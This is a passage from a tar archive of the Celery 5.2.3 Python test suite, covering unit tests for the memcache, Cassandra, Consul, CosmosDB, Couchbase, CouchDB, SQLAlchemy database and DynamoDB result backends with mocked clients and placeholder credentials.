self.mock_memcache(): for name, fun in backends.items(): assert fun() class test_memcache_key(MockCacheMixin): @pytest.mark.masked_modules('pylibmc') def test_memcache_unicode_key(self, mask_modules): with self.mock_memcache(): with conftest.reset_modules('celery.backends.cache'): from celery.backends import cache cache._imp = [None] task_id, result = str(uuid()), 42 b = cache.CacheBackend(backend='memcache', app=self.app) b.store_result(task_id, result, state=states.SUCCESS) assert b.get_result(task_id) == result @pytest.mark.masked_modules('pylibmc') def test_memcache_bytes_key(self, mask_modules): with self.mock_memcache(): with conftest.reset_modules('celery.backends.cache'): from celery.backends import cache cache._imp = [None] task_id, result = str_to_bytes(uuid()), 42 b = cache.CacheBackend(backend='memcache', app=self.app) b.store_result(task_id, result, state=states.SUCCESS) assert b.get_result(task_id) == result def test_pylibmc_unicode_key(self): with conftest.reset_modules('celery.backends.cache'): with self.mock_pylibmc(): from celery.backends import cache cache._imp = [None] task_id, result = str(uuid()), 42 b = cache.CacheBackend(backend='memcache', app=self.app) b.store_result(task_id, result, state=states.SUCCESS) assert b.get_result(task_id) == result def test_pylibmc_bytes_key(self): with conftest.reset_modules('celery.backends.cache'): with self.mock_pylibmc(): from celery.backends import cache cache._imp = [None] task_id, result = str_to_bytes(uuid()), 42 b = cache.CacheBackend(backend='memcache', app=self.app) b.store_result(task_id, result, state=states.SUCCESS) assert b.get_result(task_id) == result ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/backends/test_cassandra.py0000664000175000017500000001601100000000000021240 0ustar00asifasif00000000000000from datetime import datetime from pickle import dumps, loads from unittest.mock import Mock import pytest from celery import states from celery.exceptions import ImproperlyConfigured from celery.utils.objects import Bunch CASSANDRA_MODULES = [ 'cassandra', 'cassandra.auth', 'cassandra.cluster', 'cassandra.query', ] class test_CassandraBackend: def setup(self): self.app.conf.update( cassandra_servers=['example.com'], cassandra_keyspace='celery', cassandra_table='task_results', ) @pytest.mark.patched_module(*CASSANDRA_MODULES) def test_init_no_cassandra(self, module): # should raise ImproperlyConfigured when no python-driver # installed. from celery.backends import cassandra as mod prev, mod.cassandra = mod.cassandra, None try: with pytest.raises(ImproperlyConfigured): mod.CassandraBackend(app=self.app) finally: mod.cassandra = prev @pytest.mark.patched_module(*CASSANDRA_MODULES) def test_init_with_and_without_LOCAL_QUROM(self, module): from celery.backends import cassandra as mod mod.cassandra = Mock() cons = mod.cassandra.ConsistencyLevel = Bunch( LOCAL_QUORUM='foo', ) self.app.conf.cassandra_read_consistency = 'LOCAL_FOO' self.app.conf.cassandra_write_consistency = 'LOCAL_FOO' mod.CassandraBackend(app=self.app) cons.LOCAL_FOO = 'bar' mod.CassandraBackend(app=self.app) # no servers raises ImproperlyConfigured with pytest.raises(ImproperlyConfigured): self.app.conf.cassandra_servers = None mod.CassandraBackend( app=self.app, keyspace='b', column_family='c', ) @pytest.mark.patched_module(*CASSANDRA_MODULES) @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self, module): from celery.backends.cassandra import CassandraBackend assert loads(dumps(CassandraBackend(app=self.app))) @pytest.mark.patched_module(*CASSANDRA_MODULES) def test_get_task_meta_for(self, module): from celery.backends import cassandra as mod mod.cassandra = Mock() x = mod.CassandraBackend(app=self.app) session = x._session = Mock() execute = session.execute = Mock() result_set = Mock() result_set.one.return_value = [ states.SUCCESS, '1', datetime.now(), b'', b'' ] execute.return_value = result_set x.decode = Mock() meta = x._get_task_meta_for('task_id') assert meta['status'] == states.SUCCESS result_set.one.return_value = [] x._session.execute.return_value = result_set meta = x._get_task_meta_for('task_id') assert meta['status'] == states.PENDING def test_as_uri(self): # Just ensure as_uri works properly from celery.backends import cassandra as mod mod.cassandra = Mock() x = mod.CassandraBackend(app=self.app) x.as_uri() x.as_uri(include_password=False) @pytest.mark.patched_module(*CASSANDRA_MODULES) def test_store_result(self, module): from celery.backends import cassandra as mod mod.cassandra = Mock() x = mod.CassandraBackend(app=self.app) session = x._session = Mock() session.execute = Mock() x._store_result('task_id', 'result', states.SUCCESS) def test_timeouting_cluster(self): # Tests behavior when Cluster.connect raises # cassandra.OperationTimedOut. from celery.backends import cassandra as mod class OTOExc(Exception): pass class VeryFaultyCluster: def __init__(self, *args, **kwargs): pass def connect(self, *args, **kwargs): raise OTOExc() def shutdown(self): pass mod.cassandra = Mock() mod.cassandra.OperationTimedOut = OTOExc mod.cassandra.cluster = Mock() mod.cassandra.cluster.Cluster = VeryFaultyCluster x = mod.CassandraBackend(app=self.app) with pytest.raises(OTOExc): x._store_result('task_id', 'result', states.SUCCESS) assert x._cluster is None assert x._session is None def test_create_result_table(self): # Tests behavior when session.execute raises # cassandra.AlreadyExists. from celery.backends import cassandra as mod class OTOExc(Exception): pass class FaultySession: def __init__(self, *args, **kwargs): pass def execute(self, *args, **kwargs): raise OTOExc() class DummyCluster: def __init__(self, *args, **kwargs): pass def connect(self, *args, **kwargs): return FaultySession() mod.cassandra = Mock() mod.cassandra.cluster = Mock() mod.cassandra.cluster.Cluster = DummyCluster mod.cassandra.AlreadyExists = OTOExc x = mod.CassandraBackend(app=self.app) x._get_connection(write=True) assert x._session is not None def test_init_session(self): # Tests behavior when Cluster.connect works properly from celery.backends import cassandra as mod class DummyCluster: def __init__(self, *args, **kwargs): pass def connect(self, *args, **kwargs): return Mock() mod.cassandra = Mock() mod.cassandra.cluster = Mock() mod.cassandra.cluster.Cluster = DummyCluster x = mod.CassandraBackend(app=self.app) assert x._session is None x._get_connection(write=True) assert x._session is not None s = x._session x._get_connection() assert s is x._session def test_auth_provider(self): # Ensure valid auth_provider works properly, and invalid one raises # ImproperlyConfigured exception. from celery.backends import cassandra as mod class DummyAuth: ValidAuthProvider = Mock() mod.cassandra = Mock() mod.cassandra.auth = DummyAuth # Valid auth_provider self.app.conf.cassandra_auth_provider = 'ValidAuthProvider' self.app.conf.cassandra_auth_kwargs = { 'username': 'stuff' } mod.CassandraBackend(app=self.app) # Invalid auth_provider self.app.conf.cassandra_auth_provider = 'SpiderManAuth' self.app.conf.cassandra_auth_kwargs = { 'username': 'Jack' } with pytest.raises(ImproperlyConfigured): mod.CassandraBackend(app=self.app) def test_options(self): # Ensure valid options works properly from celery.backends import cassandra as mod mod.cassandra = Mock() # Valid options self.app.conf.cassandra_options = { 'cql_version': '3.2.1', 'protocol_version': 3 } mod.CassandraBackend(app=self.app) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_consul.py0000664000175000017500000000264100000000000020610 0ustar00asifasif00000000000000from unittest.mock import Mock import pytest from celery.backends.consul import ConsulBackend pytest.importorskip('consul') class test_ConsulBackend: def setup(self): self.backend = ConsulBackend( app=self.app, url='consul://localhost:800') def test_supports_autoexpire(self): assert self.backend.supports_autoexpire def test_consul_consistency(self): assert self.backend.consistency == 'consistent' def test_get(self): index = 100 data = {'Key': 'test-consul-1', 'Value': 'mypayload'} self.backend.one_client = Mock(name='c.client') self.backend.one_client.kv.get.return_value = (index, data) assert self.backend.get(data['Key']) == 'mypayload' def test_set(self): self.backend.one_client = Mock(name='c.client') self.backend.one_client.session.create.return_value = 'c8dfa770-4ea3-2ee9-d141-98cf0bfe9c59' self.backend.one_client.kv.put.return_value = True assert self.backend.set('Key', 'Value') is True def test_delete(self): self.backend.one_client = Mock(name='c.client') self.backend.one_client.kv.delete.return_value = True assert self.backend.delete('Key') is True def test_index_bytes_key(self): key = 'test-consul-2' assert self.backend._key_to_consul_key(key) == key assert self.backend._key_to_consul_key(key.encode('utf-8')) == key ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_cosmosdbsql.py0000664000175000017500000001157300000000000021642 0ustar00asifasif00000000000000from unittest.mock import Mock, call, patch import pytest from celery import states from celery.backends import cosmosdbsql from celery.backends.cosmosdbsql import CosmosDBSQLBackend from celery.exceptions import ImproperlyConfigured MODULE_TO_MOCK = "celery.backends.cosmosdbsql" pytest.importorskip('pydocumentdb') class test_DocumentDBBackend: def setup(self): self.url = "cosmosdbsql://:key@endpoint" self.backend = CosmosDBSQLBackend(app=self.app, url=self.url) def test_missing_third_party_sdk(self): pydocumentdb = cosmosdbsql.pydocumentdb try: cosmosdbsql.pydocumentdb = None with pytest.raises(ImproperlyConfigured): CosmosDBSQLBackend(app=self.app, url=self.url) finally: cosmosdbsql.pydocumentdb = pydocumentdb def test_bad_connection_url(self): with pytest.raises(ImproperlyConfigured): CosmosDBSQLBackend._parse_url( "cosmosdbsql://:key@") with pytest.raises(ImproperlyConfigured): CosmosDBSQLBackend._parse_url( "cosmosdbsql://:@host") with pytest.raises(ImproperlyConfigured): CosmosDBSQLBackend._parse_url( "cosmosdbsql://corrupted") def test_default_connection_url(self): endpoint, password = CosmosDBSQLBackend._parse_url( "cosmosdbsql://:key@host") assert password == "key" assert endpoint == "https://host:443" endpoint, password = CosmosDBSQLBackend._parse_url( "cosmosdbsql://:key@host:443") assert password == "key" assert endpoint == "https://host:443" endpoint, password = CosmosDBSQLBackend._parse_url( "cosmosdbsql://:key@host:8080") assert password == "key" assert endpoint == "http://host:8080" def test_bad_partition_key(self): with pytest.raises(ValueError): CosmosDBSQLBackend._get_partition_key("") with pytest.raises(ValueError): CosmosDBSQLBackend._get_partition_key(" ") with pytest.raises(ValueError): CosmosDBSQLBackend._get_partition_key(None) def test_bad_consistency_level(self): with pytest.raises(ImproperlyConfigured): CosmosDBSQLBackend(app=self.app, url=self.url, consistency_level="DoesNotExist") @patch(MODULE_TO_MOCK + ".DocumentClient") def test_create_client(self, mock_factory): mock_instance = Mock() mock_factory.return_value = mock_instance backend = CosmosDBSQLBackend(app=self.app, url=self.url) # ensure database and collection get created on client access... assert mock_instance.CreateDatabase.call_count == 0 assert mock_instance.CreateCollection.call_count == 0 assert backend._client is not None assert mock_instance.CreateDatabase.call_count == 1 assert mock_instance.CreateCollection.call_count == 1 # ...but only once per backend instance assert backend._client is not None assert mock_instance.CreateDatabase.call_count == 1 assert mock_instance.CreateCollection.call_count == 1 @patch(MODULE_TO_MOCK + ".CosmosDBSQLBackend._client") def test_get(self, mock_client): self.backend.get(b"mykey") mock_client.ReadDocument.assert_has_calls( [call("dbs/celerydb/colls/celerycol/docs/mykey", {"partitionKey": "mykey"}), call().get("value")]) @patch(MODULE_TO_MOCK + ".CosmosDBSQLBackend._client") def test_get_missing(self, mock_client): mock_client.ReadDocument.side_effect = \ cosmosdbsql.HTTPFailure(cosmosdbsql.ERROR_NOT_FOUND) assert self.backend.get(b"mykey") is None @patch(MODULE_TO_MOCK + ".CosmosDBSQLBackend._client") def test_set(self, mock_client): self.backend._set_with_state(b"mykey", "myvalue", states.SUCCESS) mock_client.CreateDocument.assert_called_once_with( "dbs/celerydb/colls/celerycol", {"id": "mykey", "value": "myvalue"}, {"partitionKey": "mykey"}) @patch(MODULE_TO_MOCK + ".CosmosDBSQLBackend._client") def test_mget(self, mock_client): keys = [b"mykey1", b"mykey2"] self.backend.mget(keys) mock_client.ReadDocument.assert_has_calls( [call("dbs/celerydb/colls/celerycol/docs/mykey1", {"partitionKey": "mykey1"}), call().get("value"), call("dbs/celerydb/colls/celerycol/docs/mykey2", {"partitionKey": "mykey2"}), call().get("value")]) @patch(MODULE_TO_MOCK + ".CosmosDBSQLBackend._client") def test_delete(self, mock_client): self.backend.delete(b"mykey") mock_client.DeleteDocument.assert_called_once_with( "dbs/celerydb/colls/celerycol/docs/mykey", {"partitionKey": "mykey"}) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_couchbase.py0000664000175000017500000001134700000000000021244 0ustar00asifasif00000000000000"""Tests for the CouchbaseBackend.""" from datetime import timedelta from unittest.mock import MagicMock, Mock, patch, sentinel import pytest from celery import states from celery.app import backends from celery.backends import couchbase as module from celery.backends.couchbase import CouchbaseBackend from celery.exceptions import ImproperlyConfigured try: import couchbase except ImportError: couchbase = None COUCHBASE_BUCKET = 'celery_bucket' pytest.importorskip('couchbase') class test_CouchbaseBackend: def setup(self): self.backend = CouchbaseBackend(app=self.app) def test_init_no_couchbase(self): prev, module.Cluster = module.Cluster, None try: with pytest.raises(ImproperlyConfigured): CouchbaseBackend(app=self.app) finally: module.Cluster = prev def test_init_no_settings(self): self.app.conf.couchbase_backend_settings = [] with pytest.raises(ImproperlyConfigured): CouchbaseBackend(app=self.app) def test_init_settings_is_None(self): self.app.conf.couchbase_backend_settings = None CouchbaseBackend(app=self.app) def test_get_connection_connection_exists(self): with patch('couchbase.cluster.Cluster') as mock_Cluster: self.backend._connection = sentinel._connection connection = self.backend._get_connection() assert sentinel._connection == connection mock_Cluster.assert_not_called() def test_get(self): self.app.conf.couchbase_backend_settings = {} x = CouchbaseBackend(app=self.app) x._connection = Mock() mocked_get = x._connection.get = Mock() mocked_get.return_value.content = sentinel.retval # should return None assert x.get('1f3fab') == sentinel.retval x._connection.get.assert_called_once_with('1f3fab') def test_set_no_expires(self): self.app.conf.couchbase_backend_settings = None x = CouchbaseBackend(app=self.app) x.expires = None x._connection = MagicMock() x._connection.set = MagicMock() # should return None assert x._set_with_state(sentinel.key, sentinel.value, states.SUCCESS) is None def test_set_expires(self): self.app.conf.couchbase_backend_settings = None x = CouchbaseBackend(app=self.app, expires=30) assert x.expires == 30 x._connection = MagicMock() x._connection.set = MagicMock() # should return None assert x._set_with_state(sentinel.key, sentinel.value, states.SUCCESS) is None def test_delete(self): self.app.conf.couchbase_backend_settings = {} x = CouchbaseBackend(app=self.app) x._connection = Mock() mocked_delete = x._connection.remove = Mock() mocked_delete.return_value = None # should return None assert x.delete('1f3fab') is None x._connection.remove.assert_called_once_with('1f3fab') def test_config_params(self): self.app.conf.couchbase_backend_settings = { 'bucket': 'mycoolbucket', 'host': ['here.host.com', 'there.host.com'], 'username': 'johndoe', 'password': 'mysecret', 'port': '1234', } x = CouchbaseBackend(app=self.app) assert x.bucket == 'mycoolbucket' assert x.host == ['here.host.com', 'there.host.com'] assert x.username == 'johndoe' assert x.password == 'mysecret' assert x.port == 1234 def test_backend_by_url(self, url='couchbase://myhost/mycoolbucket'): from celery.backends.couchbase import CouchbaseBackend backend, url_ = backends.by_url(url, self.app.loader) assert backend is CouchbaseBackend assert url_ == url def test_backend_params_by_url(self): url = 'couchbase://johndoe:mysecret@myhost:123/mycoolbucket' with self.Celery(backend=url) as app: x = app.backend assert x.bucket == 'mycoolbucket' assert x.host == 'myhost' assert x.username == 'johndoe' assert x.password == 'mysecret' assert x.port == 123 def test_expires_defaults_to_config(self): self.app.conf.result_expires = 10 b = CouchbaseBackend(expires=None, app=self.app) assert b.expires == 10 def test_expires_is_int(self): b = CouchbaseBackend(expires=48, app=self.app) assert b.expires == 48 def test_expires_is_None(self): b = CouchbaseBackend(expires=None, app=self.app) assert b.expires == self.app.conf.result_expires.total_seconds() def test_expires_is_timedelta(self): b = CouchbaseBackend(expires=timedelta(minutes=1), app=self.app) assert b.expires == 60 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_couchdb.py0000664000175000017500000000757400000000000020726 0ustar00asifasif00000000000000from unittest.mock import MagicMock, Mock, sentinel import pytest from celery import states from celery.app import backends from celery.backends import couchdb as module from celery.backends.couchdb import CouchBackend from celery.exceptions import ImproperlyConfigured try: import pycouchdb except ImportError: pycouchdb = None COUCHDB_CONTAINER = 'celery_container' pytest.importorskip('pycouchdb') class test_CouchBackend: def setup(self): self.Server = self.patching('pycouchdb.Server') self.backend = CouchBackend(app=self.app) def test_init_no_pycouchdb(self): """test init no pycouchdb raises""" prev, module.pycouchdb = module.pycouchdb, None try: with pytest.raises(ImproperlyConfigured): CouchBackend(app=self.app) finally: module.pycouchdb = prev def test_get_container_exists(self): self.backend._connection = sentinel._connection connection = self.backend.connection assert connection is sentinel._connection self.Server.assert_not_called() def test_get(self): """test_get CouchBackend.get should return and take two params db conn to couchdb is mocked. """ x = CouchBackend(app=self.app) x._connection = Mock() get = x._connection.get = MagicMock() assert x.get('1f3fab') == get.return_value['value'] x._connection.get.assert_called_once_with('1f3fab') def test_get_non_existent_key(self): x = CouchBackend(app=self.app) x._connection = Mock() get = x._connection.get = MagicMock() get.side_effect = pycouchdb.exceptions.NotFound assert x.get('1f3fab') is None x._connection.get.assert_called_once_with('1f3fab') @pytest.mark.parametrize("key", ['1f3fab', b'1f3fab']) def test_set(self, key): x = CouchBackend(app=self.app) x._connection = Mock() x._set_with_state(key, 'value', states.SUCCESS) x._connection.save.assert_called_once_with({'_id': '1f3fab', 'value': 'value'}) @pytest.mark.parametrize("key", ['1f3fab', b'1f3fab']) def test_set_with_conflict(self, key): x = CouchBackend(app=self.app) x._connection = Mock() x._connection.save.side_effect = (pycouchdb.exceptions.Conflict, None) get = x._connection.get = MagicMock() x._set_with_state(key, 'value', states.SUCCESS) x._connection.get.assert_called_once_with('1f3fab') x._connection.get('1f3fab').__setitem__.assert_called_once_with( 'value', 'value') x._connection.save.assert_called_with(get('1f3fab')) assert x._connection.save.call_count == 2 def test_delete(self): """test_delete CouchBackend.delete should return and take two params db conn to pycouchdb is mocked. TODO Should test on key not exists """ x = CouchBackend(app=self.app) x._connection = Mock() mocked_delete = x._connection.delete = Mock() mocked_delete.return_value = None # should return None assert x.delete('1f3fab') is None x._connection.delete.assert_called_once_with('1f3fab') def test_backend_by_url(self, url='couchdb://myhost/mycoolcontainer'): from celery.backends.couchdb import CouchBackend backend, url_ = backends.by_url(url, self.app.loader) assert backend is CouchBackend assert url_ == url def test_backend_params_by_url(self): url = 'couchdb://johndoe:mysecret@myhost:123/mycoolcontainer' with self.Celery(backend=url) as app: x = app.backend assert x.container == 'mycoolcontainer' assert x.host == 'myhost' assert x.username == 'johndoe' assert x.password == 'mysecret' assert x.port == 123 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_database.py0000664000175000017500000003511400000000000021052 0ustar00asifasif00000000000000from datetime import datetime from pickle import dumps, loads from unittest.mock import Mock, patch import pytest from celery import states, uuid from celery.app.task import Context from celery.exceptions import ImproperlyConfigured pytest.importorskip('sqlalchemy') from celery.backends.database import (DatabaseBackend, retry, session, # noqa session_cleanup) from celery.backends.database.models import Task, TaskSet # noqa from celery.backends.database.session import ( # noqa PREPARE_MODELS_MAX_RETRIES, ResultModelBase, SessionManager) from t import skip # noqa class SomeClass: def __init__(self, data): self.data = data def __eq__(self, cmp): return self.data == cmp.data class test_session_cleanup: def test_context(self): session = Mock(name='session') with session_cleanup(session): pass session.close.assert_called_with() def test_context_raises(self): session = Mock(name='session') with pytest.raises(KeyError): with session_cleanup(session): raise KeyError() session.rollback.assert_called_with() session.close.assert_called_with() @skip.if_pypy class test_DatabaseBackend: def setup(self): self.uri = 'sqlite:///test.db' self.app.conf.result_serializer = 'pickle' def test_retry_helper(self): from celery.backends.database import DatabaseError calls = [0] @retry def raises(): calls[0] += 1 raise DatabaseError(1, 2, 3) with pytest.raises(DatabaseError): raises(max_retries=5) assert calls[0] == 5 def test_missing_dburi_raises_ImproperlyConfigured(self): self.app.conf.database_url = None with pytest.raises(ImproperlyConfigured): DatabaseBackend(app=self.app) def test_table_schema_config(self): self.app.conf.database_table_schemas = { 'task': 'foo', 'group': 'bar', } tb = DatabaseBackend(self.uri, app=self.app) assert tb.task_cls.__table__.schema == 'foo' assert tb.task_cls.__table__.c.id.default.schema == 'foo' assert tb.taskset_cls.__table__.schema == 'bar' assert tb.taskset_cls.__table__.c.id.default.schema == 'bar' def test_table_name_config(self): self.app.conf.database_table_names = { 'task': 'foo', 'group': 'bar', } tb = DatabaseBackend(self.uri, app=self.app) assert tb.task_cls.__table__.name == 'foo' assert tb.taskset_cls.__table__.name == 'bar' def test_missing_task_id_is_PENDING(self): tb = DatabaseBackend(self.uri, app=self.app) assert tb.get_state('xxx-does-not-exist') == states.PENDING def test_missing_task_meta_is_dict_with_pending(self): tb = DatabaseBackend(self.uri, app=self.app) meta = tb.get_task_meta('xxx-does-not-exist-at-all') assert meta['status'] == states.PENDING assert meta['task_id'] == 'xxx-does-not-exist-at-all' assert meta['result'] is None assert meta['traceback'] is None def test_mark_as_done(self): tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() assert tb.get_state(tid) == states.PENDING assert tb.get_result(tid) is None tb.mark_as_done(tid, 42) assert tb.get_state(tid) == states.SUCCESS assert tb.get_result(tid) == 42 def test_is_pickled(self): tb = DatabaseBackend(self.uri, app=self.app) tid2 = uuid() result = {'foo': 'baz', 'bar': SomeClass(12345)} tb.mark_as_done(tid2, result) # is serialized properly. rindb = tb.get_result(tid2) assert rindb.get('foo') == 'baz' assert rindb.get('bar').data == 12345 def test_mark_as_started(self): tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() tb.mark_as_started(tid) assert tb.get_state(tid) == states.STARTED def test_mark_as_revoked(self): tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() tb.mark_as_revoked(tid) assert tb.get_state(tid) == states.REVOKED def test_mark_as_retry(self): tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() try: raise KeyError('foo') except KeyError as exception: import traceback trace = '\n'.join(traceback.format_stack()) tb.mark_as_retry(tid, exception, traceback=trace) assert tb.get_state(tid) == states.RETRY assert isinstance(tb.get_result(tid), KeyError) assert tb.get_traceback(tid) == trace def test_mark_as_failure(self): tb = DatabaseBackend(self.uri, app=self.app) tid3 = uuid() try: raise KeyError('foo') except KeyError as exception: import traceback trace = '\n'.join(traceback.format_stack()) tb.mark_as_failure(tid3, exception, traceback=trace) assert tb.get_state(tid3) == states.FAILURE assert isinstance(tb.get_result(tid3), KeyError) assert tb.get_traceback(tid3) == trace def test_forget(self): tb = DatabaseBackend(self.uri, backend='memory://', app=self.app) tid = uuid() tb.mark_as_done(tid, {'foo': 'bar'}) tb.mark_as_done(tid, {'foo': 'bar'}) x = self.app.AsyncResult(tid, backend=tb) x.forget() assert x.result is None def test_process_cleanup(self): tb = DatabaseBackend(self.uri, app=self.app) tb.process_cleanup() @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): tb = DatabaseBackend(self.uri, app=self.app) assert loads(dumps(tb)) def test_save__restore__delete_group(self): tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() res = {'something': 'special'} assert tb.save_group(tid, res) == res res2 = tb.restore_group(tid) assert res2 == res tb.delete_group(tid) assert tb.restore_group(tid) is None assert tb.restore_group('xxx-nonexisting-id') is None def test_cleanup(self): tb = DatabaseBackend(self.uri, app=self.app) for i in range(10): tb.mark_as_done(uuid(), 42) tb.save_group(uuid(), {'foo': 'bar'}) s = tb.ResultSession() for t in s.query(Task).all(): t.date_done = datetime.now() - tb.expires * 2 for t in s.query(TaskSet).all(): t.date_done = datetime.now() - tb.expires * 2 s.commit() s.close() tb.cleanup() def test_Task__repr__(self): assert 'foo' in repr(Task('foo')) def test_TaskSet__repr__(self): assert 'foo', repr(TaskSet('foo' in None)) @skip.if_pypy class test_DatabaseBackend_result_extended(): def setup(self): self.uri = 'sqlite:///test.db' self.app.conf.result_serializer = 'pickle' self.app.conf.result_extended = True @pytest.mark.parametrize( 'result_serializer, args, kwargs', [ ('pickle', (SomeClass(1), SomeClass(2)), {'foo': SomeClass(123)}), ('json', ['a', 'b'], {'foo': 'bar'}), ], ids=['using pickle', 'using json'] ) def test_store_result(self, result_serializer, args, kwargs): self.app.conf.result_serializer = result_serializer tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() request = Context(args=args, kwargs=kwargs, task='mytask', retries=2, hostname='celery@worker_1', delivery_info={'routing_key': 'celery'}) tb.store_result(tid, {'fizz': 'buzz'}, states.SUCCESS, request=request) meta = tb.get_task_meta(tid) assert meta['result'] == {'fizz': 'buzz'} assert meta['args'] == args assert meta['kwargs'] == kwargs assert meta['queue'] == 'celery' assert meta['name'] == 'mytask' assert meta['retries'] == 2 assert meta['worker'] == "celery@worker_1" @pytest.mark.parametrize( 'result_serializer, args, kwargs', [ ('pickle', (SomeClass(1), SomeClass(2)), {'foo': SomeClass(123)}), ('json', ['a', 'b'], {'foo': 'bar'}), ], ids=['using pickle', 'using json'] ) def test_store_none_result(self, result_serializer, args, kwargs): self.app.conf.result_serializer = result_serializer tb = DatabaseBackend(self.uri, app=self.app) tid = uuid() request = Context(args=args, kwargs=kwargs, task='mytask', retries=2, hostname='celery@worker_1', delivery_info={'routing_key': 'celery'}) tb.store_result(tid, None, states.SUCCESS, request=request) meta = tb.get_task_meta(tid) assert meta['result'] is None assert meta['args'] == args assert meta['kwargs'] == kwargs assert meta['queue'] == 'celery' assert meta['name'] == 'mytask' assert meta['retries'] == 2 assert meta['worker'] == "celery@worker_1" @pytest.mark.parametrize( 'result_serializer, args, kwargs', [ ('pickle', (SomeClass(1), SomeClass(2)), {'foo': SomeClass(123)}), ('json', ['a', 'b'], {'foo': 'bar'}), ], ids=['using pickle', 'using json'] ) def test_get_result_meta(self, result_serializer, args, kwargs): self.app.conf.result_serializer = result_serializer tb = DatabaseBackend(self.uri, app=self.app) request = Context(args=args, kwargs=kwargs, task='mytask', retries=2, hostname='celery@worker_1', delivery_info={'routing_key': 'celery'}) meta = tb._get_result_meta(result={'fizz': 'buzz'}, state=states.SUCCESS, traceback=None, request=request, format_date=False, encode=True) assert meta['result'] == {'fizz': 'buzz'} assert tb.decode(meta['args']) == args assert tb.decode(meta['kwargs']) == kwargs assert meta['queue'] == 'celery' assert meta['name'] == 'mytask' assert meta['retries'] == 2 assert meta['worker'] == "celery@worker_1" @pytest.mark.parametrize( 'result_serializer, args, kwargs', [ ('pickle', (SomeClass(1), SomeClass(2)), {'foo': SomeClass(123)}), ('json', ['a', 'b'], {'foo': 'bar'}), ], ids=['using pickle', 'using json'] ) def test_get_result_meta_with_none(self, result_serializer, args, kwargs): self.app.conf.result_serializer = result_serializer tb = DatabaseBackend(self.uri, app=self.app) request = Context(args=args, kwargs=kwargs, task='mytask', retries=2, hostname='celery@worker_1', delivery_info={'routing_key': 'celery'}) meta = tb._get_result_meta(result=None, state=states.SUCCESS, traceback=None, request=request, format_date=False, encode=True) assert meta['result'] is None assert tb.decode(meta['args']) == args assert tb.decode(meta['kwargs']) == kwargs assert meta['queue'] == 'celery' assert meta['name'] == 'mytask' assert meta['retries'] == 2 assert meta['worker'] == "celery@worker_1" class test_SessionManager: def test_after_fork(self): s = SessionManager() assert not s.forked s._after_fork() assert s.forked @patch('celery.backends.database.session.create_engine') def test_get_engine_forked(self, create_engine): s = SessionManager() s._after_fork() engine = s.get_engine('dburi', foo=1) create_engine.assert_called_with('dburi', foo=1) assert engine is create_engine() engine2 = s.get_engine('dburi', foo=1) assert engine2 is engine @patch('celery.backends.database.session.create_engine') def test_get_engine_kwargs(self, create_engine): s = SessionManager() engine = s.get_engine('dbur', foo=1, pool_size=5) assert engine is create_engine() engine2 = s.get_engine('dburi', foo=1) assert engine2 is engine @patch('celery.backends.database.session.sessionmaker') def test_create_session_forked(self, sessionmaker): s = SessionManager() s.get_engine = Mock(name='get_engine') s._after_fork() engine, session = s.create_session('dburi', short_lived_sessions=True) sessionmaker.assert_called_with(bind=s.get_engine()) assert session is sessionmaker() sessionmaker.return_value = Mock(name='new') engine, session2 = s.create_session('dburi', short_lived_sessions=True) sessionmaker.assert_called_with(bind=s.get_engine()) assert session2 is not session sessionmaker.return_value = Mock(name='new2') engine, session3 = s.create_session( 'dburi', short_lived_sessions=False) sessionmaker.assert_called_with(bind=s.get_engine()) assert session3 is session2 def test_coverage_madness(self): prev, session.register_after_fork = ( session.register_after_fork, None, ) try: SessionManager() finally: session.register_after_fork = prev @patch('celery.backends.database.session.create_engine') def test_prepare_models_terminates(self, create_engine): """SessionManager.prepare_models has retry logic because the creation of database tables by multiple workers is racy. This test patches the used method to always raise, so we can verify that it does eventually terminate. """ from sqlalchemy.dialects.sqlite import dialect from sqlalchemy.exc import DatabaseError sqlite = dialect.dbapi() manager = SessionManager() engine = manager.get_engine('dburi') def raise_err(bind): raise DatabaseError("", "", [], sqlite.DatabaseError) patch_create_all = patch.object( ResultModelBase.metadata, 'create_all', side_effect=raise_err) with pytest.raises(DatabaseError), patch_create_all as mock_create_all: manager.prepare_models(engine) assert mock_create_all.call_count == PREPARE_MODELS_MAX_RETRIES + 1 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_dynamodb.py0000664000175000017500000004547100000000000021112 0ustar00asifasif00000000000000from decimal import Decimal from unittest.mock import MagicMock, Mock, patch, sentinel import pytest from celery import states from celery.backends import dynamodb as module from celery.backends.dynamodb import DynamoDBBackend from celery.exceptions import ImproperlyConfigured pytest.importorskip('boto3') class test_DynamoDBBackend: def setup(self): self._static_timestamp = Decimal(1483425566.52) self.app.conf.result_backend = 'dynamodb://' @property def backend(self): """:rtype: DynamoDBBackend""" return self.app.backend def test_init_no_boto3(self): prev, module.boto3 = module.boto3, None try: with pytest.raises(ImproperlyConfigured): DynamoDBBackend(app=self.app) finally: module.boto3 = prev def test_init_aws_credentials(self): with pytest.raises(ImproperlyConfigured): DynamoDBBackend( app=self.app, url='dynamodb://a:@' ) def test_init_invalid_ttl_seconds_raises(self): with pytest.raises(ValueError): DynamoDBBackend( app=self.app, url='dynamodb://@?ttl_seconds=1d' ) def test_get_client_explicit_endpoint(self): table_creation_path = \ 'celery.backends.dynamodb.DynamoDBBackend._get_or_create_table' with patch('boto3.client') as mock_boto_client, \ patch(table_creation_path): self.app.conf.dynamodb_endpoint_url = 'http://my.domain.com:666' backend = 